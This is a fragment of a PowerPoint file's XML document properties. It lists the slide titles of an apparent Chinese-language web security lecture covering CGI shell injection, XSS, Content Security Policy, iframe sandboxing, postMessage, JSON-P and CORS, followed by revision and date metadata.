      <vt:lpstr>CGI：通用网关接口</vt:lpstr>
      <vt:lpstr>CGI Shell注入</vt:lpstr>
      <vt:lpstr>恶意文件上传</vt:lpstr>
      <vt:lpstr>4. HTML5的安全性改进</vt:lpstr>
      <vt:lpstr>HTML5</vt:lpstr>
      <vt:lpstr>同源策略的问题</vt:lpstr>
      <vt:lpstr>XSS攻击回顾</vt:lpstr>
      <vt:lpstr>内容安全策略</vt:lpstr>
      <vt:lpstr>CSP Header </vt:lpstr>
      <vt:lpstr>CSP条目</vt:lpstr>
      <vt:lpstr>XSS攻击回顾</vt:lpstr>
      <vt:lpstr>内联脚本的危害性</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>CSP关键字</vt:lpstr>
      <vt:lpstr>CSP动作</vt:lpstr>
      <vt:lpstr>CSP实例</vt:lpstr>
      <vt:lpstr>CSP总结</vt:lpstr>
      <vt:lpstr>通过iframe管理第三方内容</vt:lpstr>
      <vt:lpstr>HTML5沙箱</vt:lpstr>
      <vt:lpstr>沙箱的问题</vt:lpstr>
      <vt:lpstr>同源策略的问题</vt:lpstr>
      <vt:lpstr>Frame间消息传递</vt:lpstr>
      <vt:lpstr>postMessage示例</vt:lpstr>
      <vt:lpstr>postMessage广播</vt:lpstr>
      <vt:lpstr>postMessage的安全性</vt:lpstr>
      <vt:lpstr>SOP Relaxation</vt:lpstr>
      <vt:lpstr>服务端集成</vt:lpstr>
      <vt:lpstr>JSON-P</vt:lpstr>
      <vt:lpstr>JSON-P</vt:lpstr>
      <vt:lpstr>JSON-P示例</vt:lpstr>
      <vt:lpstr>JSON-P的问题</vt:lpstr>
      <vt:lpstr>CORS：跨源资源共享</vt:lpstr>
      <vt:lpstr>CORS示例</vt:lpstr>
      <vt:lpstr>预请求</vt:lpstr>
      <vt:lpstr>Origin Header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305</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-05-23T09:52:46Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-30T13:41:27Z</dcterms:modified>
</cp:coreProperties>
</file>